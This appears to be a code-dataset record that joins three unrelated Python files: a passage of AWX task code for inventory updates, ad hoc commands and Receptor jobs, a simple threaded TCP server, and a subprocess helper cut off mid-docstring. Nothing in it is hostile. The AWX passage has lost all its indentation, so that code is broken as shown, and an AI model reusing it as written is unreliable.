return {}
params = super(RunProjectUpdate, self).build_execution_environment_params(instance, private_data_dir)
project_path = instance.get_project_path(check_if_exists=False)
cache_path = instance.get_cache_path()
params.setdefault('container_volume_mounts', [])
params['container_volume_mounts'].extend(
[
f"{project_path}:{project_path}:Z",
f"{cache_path}:{cache_path}:Z",
]
)
return params
@task(queue=get_local_queuename)
class RunInventoryUpdate(BaseTask):
model = InventoryUpdate
event_model = InventoryUpdateEvent
event_data_key = 'inventory_update_id'
def build_private_data(self, inventory_update, private_data_dir):
"""
Return private data needed for inventory update.
Returns a dict of the form
{
'credentials': {
<awx.main.models.Credential>: <credential_decrypted_ssh_key_data>,
<awx.main.models.Credential>: <credential_decrypted_ssh_key_data>,
<awx.main.models.Credential>: <credential_decrypted_ssh_key_data>
}
}
If no private data is needed, return None.
"""
if inventory_update.source in InventorySource.injectors:
injector = InventorySource.injectors[inventory_update.source]()
return injector.build_private_data(inventory_update, private_data_dir)
def build_env(self, inventory_update, private_data_dir, private_data_files=None):
"""Build environment dictionary for ansible-inventory.
Most environment variables related to credentials or configuration
are accomplished by the inventory source injectors (in this method)
or custom credential type injectors (in main run method).
"""
env = super(RunInventoryUpdate, self).build_env(inventory_update, private_data_dir, private_data_files=private_data_files)
if private_data_files is None:
private_data_files = {}
# Pass inventory source ID to inventory script.
env['INVENTORY_SOURCE_ID'] = str(inventory_update.inventory_source_id)
env['INVENTORY_UPDATE_ID'] = str(inventory_update.pk)
env.update(STANDARD_INVENTORY_UPDATE_ENV)
injector = None
if inventory_update.source in InventorySource.injectors:
injector = InventorySource.injectors[inventory_update.source]()
if injector is not None:
env = injector.build_env(inventory_update, env, private_data_dir, private_data_files)
# All CLOUD_PROVIDERS sources implement as inventory plugin from collection
env['ANSIBLE_INVENTORY_ENABLED'] = 'auto'
if inventory_update.source == 'scm':
for env_k in inventory_update.source_vars_dict:
if str(env_k) not in env and str(env_k) not in settings.INV_ENV_VARIABLE_BLOCKED:
env[str(env_k)] = str(inventory_update.source_vars_dict[env_k])
elif inventory_update.source == 'file':
raise NotImplementedError('Cannot update file sources through the task system.')
if inventory_update.source == 'scm' and inventory_update.source_project_update:
env_key = 'ANSIBLE_COLLECTIONS_PATHS'
config_setting = 'collections_paths'
folder = 'requirements_collections'
default = '~/.ansible/collections:/usr/share/ansible/collections'
config_values = read_ansible_config(os.path.join(private_data_dir, 'project'), [config_setting])
paths = default.split(':')
if env_key in env:
for path in env[env_key].split(':'):
if path not in paths:
paths = [env[env_key]] + paths
elif config_setting in config_values:
for path in config_values[config_setting].split(':'):
if path not in paths:
paths = [config_values[config_setting]] + paths
paths = [os.path.join(CONTAINER_ROOT, folder)] + paths
env[env_key] = os.pathsep.join(paths)
if 'ANSIBLE_COLLECTIONS_PATHS' in env:
paths = env['ANSIBLE_COLLECTIONS_PATHS'].split(':')
else:
paths = ['~/.ansible/collections', '/usr/share/ansible/collections']
paths.append('/usr/share/automation-controller/collections')
env['ANSIBLE_COLLECTIONS_PATHS'] = os.pathsep.join(paths)
return env
def write_args_file(self, private_data_dir, args):
path = os.path.join(private_data_dir, 'args')
handle = os.open(path, os.O_RDWR | os.O_CREAT, stat.S_IREAD | stat.S_IWRITE)
f = os.fdopen(handle, 'w')
f.write(' '.join(args))
f.close()
os.chmod(path, stat.S_IRUSR)
return path
def build_args(self, inventory_update, private_data_dir, passwords):
"""Build the command line argument list for running an inventory
import.
"""
# Get the inventory source and inventory.
inventory_source = inventory_update.inventory_source
inventory = inventory_source.inventory
if inventory is None:
raise RuntimeError('Inventory Source is not associated with an Inventory.')
args = ['ansible-inventory', '--list', '--export']
# Add arguments for the source inventory file/script/thing
rel_path = self.pseudo_build_inventory(inventory_update, private_data_dir)
container_location = os.path.join(CONTAINER_ROOT, rel_path)
source_location = os.path.join(private_data_dir, rel_path)
args.append('-i')
args.append(container_location)
args.append('--output')
args.append(os.path.join(CONTAINER_ROOT, 'artifacts', str(inventory_update.id), 'output.json'))
if os.path.isdir(source_location):
playbook_dir = container_location
else:
playbook_dir = os.path.dirname(container_location)
args.extend(['--playbook-dir', playbook_dir])
if inventory_update.verbosity:
args.append('-' + 'v' * min(5, inventory_update.verbosity * 2 + 1))
return args
def build_inventory(self, inventory_update, private_data_dir):
return None # what runner expects in order to not deal with inventory
def pseudo_build_inventory(self, inventory_update, private_data_dir):
"""Inventory imports are ran through a management command
we pass the inventory in args to that command, so this is not considered
to be "Ansible" inventory (by runner) even though it is
Eventually, we would like to cut out the management command,
and thus use this as the real inventory
"""
src = inventory_update.source
injector = None
if inventory_update.source in InventorySource.injectors:
injector = InventorySource.injectors[src]()
if injector is not None:
content = injector.inventory_contents(inventory_update, private_data_dir)
# must be a statically named file
inventory_path = os.path.join(private_data_dir, 'inventory', injector.filename)
with open(inventory_path, 'w') as f:
f.write(content)
os.chmod(inventory_path, stat.S_IRUSR | stat.S_IWUSR | stat.S_IXUSR)
rel_path = os.path.join('inventory', injector.filename)
elif src == 'scm':
rel_path = os.path.join('project', inventory_update.source_path)
return rel_path
def build_playbook_path_relative_to_cwd(self, inventory_update, private_data_dir):
return None
def build_credentials_list(self, inventory_update):
# All credentials not used by inventory source injector
return inventory_update.get_extra_credentials()
def pre_run_hook(self, inventory_update, private_data_dir):
super(RunInventoryUpdate, self).pre_run_hook(inventory_update, private_data_dir)
source_project = None
if inventory_update.inventory_source:
source_project = inventory_update.inventory_source.source_project
if (
inventory_update.source == 'scm' and inventory_update.launch_type != 'scm' and source_project and source_project.scm_type
): # never ever update manual projects
# Check if the content cache exists, so that we do not unnecessarily re-download roles
sync_needs = ['update_{}'.format(source_project.scm_type)]
has_cache = os.path.exists(os.path.join(source_project.get_cache_path(), source_project.cache_id))
# Galaxy requirements are not supported for manual projects
if not has_cache:
sync_needs.extend(['install_roles', 'install_collections'])
local_project_sync = source_project.create_project_update(
_eager_fields=dict(
launch_type="sync",
job_type='run',
job_tags=','.join(sync_needs),
status='running',
execution_node=inventory_update.execution_node,
instance_group=inventory_update.instance_group,
celery_task_id=inventory_update.celery_task_id,
)
)
# associate the inventory update before calling run() so that a
# cancel() call on the inventory update can cancel the project update
local_project_sync.scm_inventory_updates.add(inventory_update)
project_update_task = local_project_sync._get_task_class()
try:
sync_task = project_update_task(job_private_data_dir=private_data_dir)
sync_task.run(local_project_sync.id)
local_project_sync.refresh_from_db()
inventory_update.inventory_source.scm_last_revision = local_project_sync.scm_revision
inventory_update.inventory_source.save(update_fields=['scm_last_revision'])
except Exception:
inventory_update = self.update_model(
inventory_update.pk,
status='failed',
job_explanation=(
'Previous Task Failed: {"job_type": "%s", "job_name": "%s", "job_id": "%s"}'
% ('project_update', local_project_sync.name, local_project_sync.id)
),
)
raise
elif inventory_update.source == 'scm' and inventory_update.launch_type == 'scm' and source_project:
# This follows update, not sync, so make copy here
RunProjectUpdate.make_local_copy(source_project, private_data_dir)
def post_run_hook(self, inventory_update, status):
super(RunInventoryUpdate, self).post_run_hook(inventory_update, status)
if status != 'successful':
return # nothing to save, step out of the way to allow error reporting
private_data_dir = inventory_update.job_env['AWX_PRIVATE_DATA_DIR']
expected_output = os.path.join(private_data_dir, 'artifacts', 'output.json')
with open(expected_output) as f:
data = json.load(f)
# build inventory save options
options = dict(
overwrite=inventory_update.overwrite,
overwrite_vars=inventory_update.overwrite_vars,
)
src = inventory_update.source
if inventory_update.enabled_var:
options['enabled_var'] = inventory_update.enabled_var
options['enabled_value'] = inventory_update.enabled_value
else:
if getattr(settings, '%s_ENABLED_VAR' % src.upper(), False):
options['enabled_var'] = getattr(settings, '%s_ENABLED_VAR' % src.upper())
if getattr(settings, '%s_ENABLED_VALUE' % src.upper(), False):
options['enabled_value'] = getattr(settings, '%s_ENABLED_VALUE' % src.upper())
if inventory_update.host_filter:
options['host_filter'] = inventory_update.host_filter
if getattr(settings, '%s_EXCLUDE_EMPTY_GROUPS' % src.upper()):
options['exclude_empty_groups'] = True
if getattr(settings, '%s_INSTANCE_ID_VAR' % src.upper(), False):
options['instance_id_var'] = getattr(settings, '%s_INSTANCE_ID_VAR' % src.upper())
# Verbosity is applied to saving process, as well as ansible-inventory CLI option
if inventory_update.verbosity:
options['verbosity'] = inventory_update.verbosity
handler = SpecialInventoryHandler(
self.event_handler,
self.cancel_callback,
verbosity=inventory_update.verbosity,
job_timeout=self.get_instance_timeout(self.instance),
start_time=inventory_update.started,
counter=self.event_ct,
initial_line=self.end_line,
)
inv_logger = logging.getLogger('awx.main.commands.inventory_import')
formatter = inv_logger.handlers[0].formatter
formatter.job_start = inventory_update.started
handler.formatter = formatter
inv_logger.handlers[0] = handler
from awx.main.management.commands.inventory_import import Command as InventoryImportCommand
cmd = InventoryImportCommand()
try:
# save the inventory data to database.
# canceling exceptions will be handled in the global post_run_hook
cmd.perform_update(options, data, inventory_update)
except PermissionDenied as exc:
logger.exception('License error saving {} content'.format(inventory_update.log_format))
raise PostRunError(str(exc), status='error')
except PostRunError:
logger.exception('Error saving {} content, rolling back changes'.format(inventory_update.log_format))
raise
except Exception:
logger.exception('Exception saving {} content, rolling back changes.'.format(inventory_update.log_format))
raise PostRunError('Error occurred while saving inventory data, see traceback or server logs', status='error', tb=traceback.format_exc())
@task(queue=get_local_queuename)
class RunAdHocCommand(BaseTask):
"""
Run an ad hoc command using ansible.
"""
model = AdHocCommand
event_model = AdHocCommandEvent
event_data_key = 'ad_hoc_command_id'
def build_private_data(self, ad_hoc_command, private_data_dir):
"""
Return SSH private key data needed for this ad hoc command (only if
stored in DB as ssh_key_data).
Returns a dict of the form
{
'credentials': {
<awx.main.models.Credential>: <credential_decrypted_ssh_key_data>,
<awx.main.models.Credential>: <credential_decrypted_ssh_key_data>,
...
},
'certificates': {
<awx.main.models.Credential>: <signed SSH certificate data>,
<awx.main.models.Credential>: <signed SSH certificate data>,
...
}
}
"""
# If we were sent SSH credentials, decrypt them and send them
# back (they will be written to a temporary file).
creds = ad_hoc_command.credential
private_data = {'credentials': {}}
if creds and creds.has_input('ssh_key_data'):
private_data['credentials'][creds] = creds.get_input('ssh_key_data', default='')
if creds and creds.has_input('ssh_public_key_data'):
private_data.setdefault('certificates', {})[creds] = creds.get_input('ssh_public_key_data', default='')
return private_data
def build_passwords(self, ad_hoc_command, runtime_passwords):
"""
Build a dictionary of passwords for SSH private key, SSH user and
sudo/su.
"""
passwords = super(RunAdHocCommand, self).build_passwords(ad_hoc_command, runtime_passwords)
cred = ad_hoc_command.credential
if cred:
for field in ('ssh_key_unlock', 'ssh_password', 'become_password'):
value = runtime_passwords.get(field, cred.get_input('password' if field == 'ssh_password' else field, default=''))
if value not in ('', 'ASK'):
passwords[field] = value
return passwords
def build_env(self, ad_hoc_command, private_data_dir, private_data_files=None):
"""
Build environment dictionary for ansible.
"""
env = super(RunAdHocCommand, self).build_env(ad_hoc_command, private_data_dir, private_data_files=private_data_files)
# Set environment variables needed for inventory and ad hoc event
# callbacks to work.
env['AD_HOC_COMMAND_ID'] = str(ad_hoc_command.pk)
env['INVENTORY_ID'] = str(ad_hoc_command.inventory.pk)
env['INVENTORY_HOSTVARS'] = str(True)
env['ANSIBLE_LOAD_CALLBACK_PLUGINS'] = '1'
env['ANSIBLE_SFTP_BATCH_MODE'] = 'False'
return env
def build_args(self, ad_hoc_command, private_data_dir, passwords):
"""
Build command line argument list for running ansible, optionally using
ssh-agent for public/private key authentication.
"""
creds = ad_hoc_command.credential
ssh_username, become_username, become_method = '', '', ''
if creds:
ssh_username = creds.get_input('username', default='')
become_method = creds.get_input('become_method', default='')
become_username = creds.get_input('become_username', default='')
else:
become_method = None
become_username = ""
# Always specify the normal SSH user as root by default. Since this
# task is normally running in the background under a service account,
# it doesn't make sense to rely on ansible's default of using the
# current user.
ssh_username = ssh_username or 'root'
args = []
if ad_hoc_command.job_type == 'check':
args.append('--check')
args.extend(['-u', sanitize_jinja(ssh_username)])
if 'ssh_password' in passwords:
args.append('--ask-pass')
# We only specify sudo/su user and password if explicitly given by the
# credential. Credential should never specify both sudo and su.
if ad_hoc_command.become_enabled:
args.append('--become')
if become_method:
args.extend(['--become-method', sanitize_jinja(become_method)])
if become_username:
args.extend(['--become-user', sanitize_jinja(become_username)])
if 'become_password' in passwords:
args.append('--ask-become-pass')
if ad_hoc_command.forks: # FIXME: Max limit?
args.append('--forks=%d' % ad_hoc_command.forks)
if ad_hoc_command.diff_mode:
args.append('--diff')
if ad_hoc_command.verbosity:
args.append('-%s' % ('v' * min(5, ad_hoc_command.verbosity)))
extra_vars = ad_hoc_command.awx_meta_vars()
if ad_hoc_command.extra_vars_dict:
redacted_extra_vars, removed_vars = extract_ansible_vars(ad_hoc_command.extra_vars_dict)
if removed_vars:
raise ValueError(_("{} are prohibited from use in ad hoc commands.").format(", ".join(removed_vars)))
extra_vars.update(ad_hoc_command.extra_vars_dict)
if ad_hoc_command.limit:
args.append(ad_hoc_command.limit)
else:
args.append('all')
return args
def build_extra_vars_file(self, ad_hoc_command, private_data_dir):
extra_vars = ad_hoc_command.awx_meta_vars()
if ad_hoc_command.extra_vars_dict:
redacted_extra_vars, removed_vars = extract_ansible_vars(ad_hoc_command.extra_vars_dict)
if removed_vars:
raise ValueError(_("{} are prohibited from use in ad hoc commands.").format(", ".join(removed_vars)))
extra_vars.update(ad_hoc_command.extra_vars_dict)
self._write_extra_vars_file(private_data_dir, extra_vars)
def build_module_name(self, ad_hoc_command):
return ad_hoc_command.module_name
def build_module_args(self, ad_hoc_command):
module_args = ad_hoc_command.module_args
if settings.ALLOW_JINJA_IN_EXTRA_VARS != 'always':
module_args = sanitize_jinja(module_args)
return module_args
def build_playbook_path_relative_to_cwd(self, job, private_data_dir):
return None
def get_password_prompts(self, passwords={}):
d = super(RunAdHocCommand, self).get_password_prompts()
d[r'Enter passphrase for .*:\s*?$'] = 'ssh_key_unlock'
d[r'Bad passphrase, try again for .*:\s*?$'] = ''
for method in PRIVILEGE_ESCALATION_METHODS:
d[r'%s password.*:\s*?$' % (method[0])] = 'become_password'
d[r'%s password.*:\s*?$' % (method[0].upper())] = 'become_password'
d[r'BECOME password.*:\s*?$'] = 'become_password'
d[r'SSH password:\s*?$'] = 'ssh_password'
d[r'Password:\s*?$'] = 'ssh_password'
return d
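# --- Hedged illustration (not part of AWX) ---
# The get_password_prompts() methods above build mappings from prompt regexes
# to password keys (e.g. 'ssh_password', 'become_password'). The helper below
# is a minimal, hypothetical sketch of how such a mapping could be consulted
# against a line of interactive output; it is not used by AWX itself.
def _match_password_prompt(prompt_map, output_line):
    import re
    for pattern, password_key in prompt_map.items():
        if re.search(pattern, output_line):
            return password_key
    return None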
@task(queue=get_local_queuename)
class RunSystemJob(BaseTask):
model = SystemJob
event_model = SystemJobEvent
event_data_key = 'system_job_id'
def build_execution_environment_params(self, system_job, private_data_dir):
return {}
def build_args(self, system_job, private_data_dir, passwords):
args = ['awx-manage', system_job.job_type]
try:
# System Job extra_vars can be blank, must be JSON if not blank
if system_job.extra_vars == '':
json_vars = {}
else:
json_vars = json.loads(system_job.extra_vars)
if system_job.job_type in ('cleanup_jobs', 'cleanup_activitystream'):
if 'days' in json_vars:
args.extend(['--days', str(json_vars.get('days', 60))])
if 'dry_run' in json_vars and json_vars['dry_run']:
args.extend(['--dry-run'])
if system_job.job_type == 'cleanup_jobs':
args.extend(
['--jobs', '--project-updates', '--inventory-updates', '--management-jobs', '--ad-hoc-commands', '--workflow-jobs', '--notifications']
)
except Exception:
logger.exception("{} Failed to parse system job".format(system_job.log_format))
return args
def write_args_file(self, private_data_dir, args):
path = os.path.join(private_data_dir, 'args')
handle = os.open(path, os.O_RDWR | os.O_CREAT, stat.S_IREAD | stat.S_IWRITE)
f = os.fdopen(handle, 'w')
f.write(' '.join(args))
f.close()
os.chmod(path, stat.S_IRUSR)
return path
def build_env(self, instance, private_data_dir, private_data_files=None):
base_env = super(RunSystemJob, self).build_env(instance, private_data_dir, private_data_files=private_data_files)
# TODO: this is able to run by turning off isolation
# the goal is to run it in a container instead
env = dict(os.environ.items())
env.update(base_env)
return env
def build_playbook_path_relative_to_cwd(self, job, private_data_dir):
return None
def build_inventory(self, instance, private_data_dir):
return None
def _reconstruct_relationships(copy_mapping):
for old_obj, new_obj in copy_mapping.items():
model = type(old_obj)
for field_name in getattr(model, 'FIELDS_TO_PRESERVE_AT_COPY', []):
field = model._meta.get_field(field_name)
if isinstance(field, ForeignKey):
if getattr(new_obj, field_name, None):
continue
related_obj = getattr(old_obj, field_name)
related_obj = copy_mapping.get(related_obj, related_obj)
setattr(new_obj, field_name, related_obj)
elif field.many_to_many:
for related_obj in getattr(old_obj, field_name).all():
logger.debug('Deep copy: Adding {} to {}({}).{} relationship'.format(related_obj, new_obj, model, field_name))
getattr(new_obj, field_name).add(copy_mapping.get(related_obj, related_obj))
new_obj.save()
@task(queue=get_local_queuename)
def deep_copy_model_obj(model_module, model_name, obj_pk, new_obj_pk, user_pk, uuid, permission_check_func=None):
sub_obj_list = cache.get(uuid)
if sub_obj_list is None:
logger.error('Deep copy {} from {} to {} failed unexpectedly.'.format(model_name, obj_pk, new_obj_pk))
return
logger.debug('Deep copy {} from {} to {}.'.format(model_name, obj_pk, new_obj_pk))
from awx.api.generics import CopyAPIView
from awx.main.signals import disable_activity_stream
model = getattr(importlib.import_module(model_module), model_name, None)
if model is None:
return
try:
obj = model.objects.get(pk=obj_pk)
new_obj = model.objects.get(pk=new_obj_pk)
creater = User.objects.get(pk=user_pk)
except ObjectDoesNotExist:
logger.warning("Object or user no longer exists.")
return
with transaction.atomic(), ignore_inventory_computed_fields(), disable_activity_stream():
copy_mapping = {}
for sub_obj_setup in sub_obj_list:
sub_model = getattr(importlib.import_module(sub_obj_setup[0]), sub_obj_setup[1], None)
if sub_model is None:
continue
try:
sub_obj = sub_model.objects.get(pk=sub_obj_setup[2])
except ObjectDoesNotExist:
continue
copy_mapping.update(CopyAPIView.copy_model_obj(obj, new_obj, sub_model, sub_obj, creater))
_reconstruct_relationships(copy_mapping)
if permission_check_func:
permission_check_func = getattr(getattr(importlib.import_module(permission_check_func[0]), permission_check_func[1]), permission_check_func[2])
permission_check_func(creater, copy_mapping.values())
if isinstance(new_obj, Inventory):
update_inventory_computed_fields.delay(new_obj.id)
class TransmitterThread(threading.Thread):
def run(self):
self.exc = None
try:
super().run()
except Exception:
self.exc = sys.exc_info()
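# --- Hedged usage sketch (not part of AWX) ---
# TransmitterThread above stores sys.exc_info() so the code that spawned it can
# surface a failure from the worker thread, as _run_internal does further down.
# The helper name below is hypothetical and only illustrates that pattern.
def _rejoin_and_reraise(thread):
    # Wait for the thread; if its target raised, re-raise with the original traceback.
    thread.join()
    exc = getattr(thread, 'exc', None)
    if exc:
        raise exc[1].with_traceback(exc[2])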
class AWXReceptorJob:
def __init__(self, task=None, runner_params=None):
self.task = task
self.runner_params = runner_params
self.unit_id = None
if self.task and not self.task.instance.is_container_group_task:
execution_environment_params = self.task.build_execution_environment_params(self.task.instance, runner_params['private_data_dir'])
self.runner_params['settings'].update(execution_environment_params)
def run(self):
# We establish a connection to the Receptor socket
receptor_ctl = ReceptorControl('/var/run/receptor/receptor.sock')
try:
return self._run_internal(receptor_ctl)
finally:
# Make sure to always release the work unit if we established it
if self.unit_id is not None and settings.RECEPTOR_RELEASE_WORK:
receptor_ctl.simple_command(f"work release {self.unit_id}")
def _run_internal(self, receptor_ctl):
# Create a socketpair. Where the left side will be used for writing our payload
# (private data dir, kwargs). The right side will be passed to Receptor for
# reading.
sockin, sockout = socket.socketpair()
transmitter_thread = TransmitterThread(target=self.transmit, args=[sockin])
transmitter_thread.start()
# submit our work, passing
# in the right side of our socketpair for reading.
result = receptor_ctl.submit_work(worktype=self.work_type, payload=sockout.makefile('rb'), params=self.receptor_params)
self.unit_id = result['unitid']
sockin.close()
sockout.close()
if transmitter_thread.exc:
raise transmitter_thread.exc[1].with_traceback(transmitter_thread.exc[2])
transmitter_thread.join()
resultsock, resultfile = receptor_ctl.get_work_results(self.unit_id, return_socket=True, return_sockfile=True)
# Both "processor" and "cancel_watcher" are spawned in separate threads.
# We wait for the first one to return. If cancel_watcher returns first,
# we yank the socket out from underneath the processor, which will cause it
# to exit. A reference to the processor_future is passed into the cancel_watcher_future,
# which exits if the job has finished normally. The context manager ensures we do not
# leave any threads lying around.
with concurrent.futures.ThreadPoolExecutor(max_workers=2) as executor:
processor_future = executor.submit(self.processor, resultfile)
cancel_watcher_future = executor.submit(self.cancel_watcher, processor_future)
futures = [processor_future, cancel_watcher_future]
first_future = concurrent.futures.wait(futures, return_when=concurrent.futures.FIRST_COMPLETED)
res = list(first_future.done)[0].result()
if res.status == 'canceled':
receptor_ctl.simple_command(f"work cancel {self.unit_id}")
resultsock.shutdown(socket.SHUT_RDWR)
resultfile.close()
elif res.status == 'error':
# TODO: There should be a more efficient way of getting this information
receptor_work_list = receptor_ctl.simple_command("work list")
detail = receptor_work_list[self.unit_id]['Detail']
state_name = receptor_work_list[self.unit_id]['StateName']
if 'exceeded quota' in detail:
logger.warning(detail)
log_name = self.task.instance.log_format
logger.warning(f"Could not launch pod for {log_name}. Exceeded quota.")
self.task.update_model(self.task.instance.pk, status='pending')
return
# If ansible-runner ran, but an error occurred at runtime, the traceback information
# is saved via the status_handler passed in to the processor.
if state_name == 'Succeeded':
return res
raise RuntimeError(detail)
return res
# Spawned in a thread so Receptor can start reading before we finish writing;
# we write our payload to the left side of our socketpair.
@cleanup_new_process
def transmit(self, _socket):
if not settings.IS_K8S and self.work_type == 'local':
self.runner_params['only_transmit_kwargs'] = True
try:
ansible_runner.interface.run(streamer='transmit', _output=_socket.makefile('wb'), **self.runner_params)
finally:
# Socket must be shutdown here, or the reader will hang forever.
_socket.shutdown(socket.SHUT_WR)
@cleanup_new_process
def processor(self, resultfile):
return ansible_runner.interface.run(
streamer='process',
quiet=True,
_input=resultfile,
event_handler=self.task.event_handler,
finished_callback=self.task.finished_callback,
status_handler=self.task.status_handler,
**self.runner_params,
)
@property
def receptor_params(self):
if self.task.instance.is_container_group_task:
spec_yaml = yaml.dump(self.pod_definition, explicit_start=True)
receptor_params = {
"secret_kube_pod": spec_yaml,
"pod_pending_timeout": getattr(settings, 'AWX_CONTAINER_GROUP_POD_PENDING_TIMEOUT', "5m"),
}
if self.credential:
kubeconfig_yaml = yaml.dump(self.kube_config, explicit_start=True)
receptor_params["secret_kube_config"] = kubeconfig_yaml
else:
private_data_dir = self.runner_params['private_data_dir']
receptor_params = {"params": f"--private-data-dir={private_data_dir}"}
return receptor_params
@property
def work_type(self):
if self.task.instance.is_container_group_task:
if self.credential:
work_type = 'kubernetes-runtime-auth'
else:
work_type = 'kubernetes-incluster-auth'
else:
work_type = 'local'
return work_type
@cleanup_new_process
def cancel_watcher(self, processor_future):
while True:
if processor_future.done():
return processor_future.result()
if self.task.cancel_callback():
result = namedtuple('result', ['status', 'rc'])
return result('canceled', 1)
if hasattr(self, 'unit_id') and 'RECEPTOR_UNIT_ID' not in self.task.instance.job_env:
self.task.instance.job_env['RECEPTOR_UNIT_ID'] = self.unit_id
self.task.update_model(self.task.instance.pk, job_env=self.task.instance.job_env)
time.sleep(1)
@property
def pod_definition(self):
if self.task and self.task.instance.execution_environment:
ee = self.task.instance.execution_environment
else:
ee = get_default_execution_environment()
default_pod_spec = get_default_pod_spec()
pod_spec_override = {}
if self.task and self.task.instance.instance_group.pod_spec_override:
pod_spec_override = parse_yaml_or_json(self.task.instance.instance_group.pod_spec_override)
pod_spec = {**default_pod_spec, **pod_spec_override}
pod_spec['spec']['containers'][0]['image'] = ee.image
pod_spec['spec']['containers'][0]['args'] = ['ansible-runner', 'worker', '--private-data-dir=/runner']
# Enforce EE Pull Policy
pull_options = {"always": "Always", "missing": "IfNotPresent", "never": "Never"}
if self.task and self.task.instance.execution_environment:
if self.task.instance.execution_environment.pull:
pod_spec['spec']['containers'][0]['imagePullPolicy'] = pull_options[self.task.instance.execution_environment.pull]
if self.task and self.task.instance.is_container_group_task:
# If EE credential is passed, create an imagePullSecret
if self.task.instance.execution_environment and self.task.instance.execution_environment.credential:
# Create pull secret in k8s cluster based on ee cred
from awx.main.scheduler.kubernetes import PodManager # prevent circular import
pm = PodManager(self.task.instance)
secret_name = pm.create_secret(job=self.task.instance)
# Inject secret name into podspec
pod_spec['spec']['imagePullSecrets'] = [{"name": secret_name}]
if self.task:
pod_spec['metadata'] = deepmerge(
pod_spec.get('metadata', {}),
dict(name=self.pod_name, labels={'ansible-awx': settings.INSTALL_UUID, 'ansible-awx-job-id': str(self.task.instance.id)}),
)
return pod_spec
@property
def pod_name(self):
return f"automation-job-{self.task.instance.id}"
@property
def credential(self):
return self.task.instance.instance_group.credential
@property
def namespace(self):
return self.pod_definition['metadata']['namespace']
@property
def kube_config(self):
host_input = self.credential.get_input('host')
config = {
"apiVersion": "v1",
"kind": "Config",
"preferences": {},
"clusters": [{"name": host_input, "cluster": {"server": host_input}}],
"users": [{"name": host_input, "user": {"token": self.credential.get_input('bearer_token')}}],
"contexts": [{"name": host_input, "context": {"cluster": host_input, "user": host_input, "namespace": self.namespace}}],
"current-context": host_input,
}
if self.credential.get_input('verify_ssl') and 'ssl_ca_cert' in self.credential.inputs:
config["clusters"][0]["cluster"]["certificate-authority-data"] = b64encode(
self.credential.get_input('ssl_ca_cert').encode() # encode to bytes
).decode() # decode the base64 data into a str
else:
config["clusters"][0]["cluster"]["insecure-skip-tls-verify"] = True
return config
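# --- Hedged illustration (not part of AWX) ---
# A standalone sketch of the "two futures, first one wins" pattern used in
# AWXReceptorJob._run_internal above: one future does the work, a second polls
# a cancel flag, and whichever completes first decides the outcome. All names
# here (work_fn, should_cancel, _run_with_cancel_watcher) are hypothetical.
def _run_with_cancel_watcher(work_fn, should_cancel, poll_interval=0.5):
    import concurrent.futures
    import time
    def watcher(work_future):
        # Poll until the work finishes on its own or a cancel is requested.
        while not work_future.done():
            if should_cancel():
                return 'canceled'
            time.sleep(poll_interval)
        return work_future.result()
    with concurrent.futures.ThreadPoolExecutor(max_workers=2) as executor:
        work_future = executor.submit(work_fn)
        watch_future = executor.submit(watcher, work_future)
        done, _ = concurrent.futures.wait([work_future, watch_future], return_when=concurrent.futures.FIRST_COMPLETED)
        # Whichever future finished first carries the result acted upon.
        return list(done)[0].result()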
|
tcp-server.py
|
# Basic socket tcp server
import socket
import sys
import threading
def main(host='localhost', port=2300):
with socket.socket(socket.AF_INET, socket.SOCK_STREAM) as s:
print(host, port)
s.bind((host, int(port)))
s.listen(10)
while 1:
client, addr = s.accept()
print('Connection from {}'.format(addr))
t = threading.Thread(target=handle_client, args=(client, addr))
t.start()
def handle_client(client, addr):
    while 1:
        try:
            data = client.recv(1024)
            if len(data) != 0:
                print('Data recv from {}: {}'.format(addr, data))
            else:
                # An empty read means the client closed the connection.
                client.close()
                break
        except OSError:
            client.close()
            break
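# --- Hedged usage sketch (not invoked by this module) ---
# A minimal client that exercises the server above: it connects with the same
# defaults and sends a couple of messages, which the server prints from
# handle_client(). The name demo_client is hypothetical.
def demo_client(host='localhost', port=2300):
    with socket.socket(socket.AF_INET, socket.SOCK_STREAM) as c:
        c.connect((host, int(port)))
        for message in (b'hello', b'world'):
            c.sendall(message)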
if __name__ == '__main__':
main(*sys.argv[1:])
|
subproc.py
|
"""
ttt.subproc
~~~~~~~~~~~~
This module provides additional functions for subprocess execution built on top
of the existing subprocess module.
:copyright: (c) yerejm
"""
import os
import subprocess
import sys
import threading
from six.moves import queue
def execute(*args, **kwargs):
"""Wrapper around subprocess.check_output where the universal newlines
option is enabled.
Otherwise, operates the same as that function.
"""
kwargs["universal_newlines"] = True
return subprocess.check_output(*args, **kwargs).splitlines()
def checked_call(*args, **kwargs):
"""Wrapper around subprocess.checked_call where the universal newlines
option is enabled.
Otherwise, operates the same as that function.
"""
kwargs["universal_newlines"] = True
return subprocess.check_call(*args, **kwargs)
def streamed_call(*args, **kwargs):
"""A subprocess.call where output can be sent to the caller in real time.
Arguments to subprocess.Popen are applicable to streamed_call with a few
differences.
To receive the lines of output, pass an object for the listener keyword
argument that provides the interface fn(channel, message), where channel
is the stream the message was sent to (e.g. stdout, stderr) and message
is the line of output without the platform line ending.
Due to the nature of this call, the keyword arguments stdout and stdin
cannot be provided.
Universal newline handling is forced.
:param listener: (optional) an object that consumes the output from the
executing subprocess.
:return (process.returncode, stdout list, stderr list) tuple
"""
kwargs["universal_newlines"] = True
return call_output(*args, **kwargs)
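# --- Hedged usage sketch ---
# streamed_call() expects the optional listener to be a callable of the shape
# fn(channel, message); the example below simply tags each captured line. The
# names _example_listener/_example_usage and the chosen command are hypothetical
# and exist only for illustration.
def _example_listener(channel, message):
    # channel is sys.stdout or sys.stderr; message has no trailing newline.
    channel.write("[captured] {}\n".format(message))
    channel.flush()
def _example_usage():
    # Not called anywhere; returns (returncode, stdout_lines, stderr_lines).
    return streamed_call([sys.executable, "--version"], listener=_example_listener)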
#
# The following functions should not be used directly.
# They play with threads.
#
def call_output(*popenargs, **kwargs):
"""A custom version of subprocess.call_output() that operates in the same
way except it allows the optional provision of a callback that is called
for each line of output emitted by the subprocess.
"""
def create_process(*popenargs, **kwargs):
return subprocess.Popen(*popenargs, **kwargs)
if "stdout" in kwargs:
raise ValueError("stdout argument not allowed, it will be overridden.")
if "stdin" in kwargs:
raise ValueError("stdin argument not allowed, it will be overridden.")
kwargs["stdin"] = subprocess.PIPE
line_handler = kwargs.pop("listener", None)
with create_process(
*popenargs, stdout=subprocess.PIPE, stderr=subprocess.STDOUT, **kwargs
) as process:
return run(process, line_handler)
def run(process, line_handler):
"""Maintains the process being executed in a subprocess until it ends.
Lines of output emitted by the process are sent to the line handler, if
any.
Communication between the process executing run() and the subprocess is
handled by threads reading from the stdout and stderr streams. Threads are
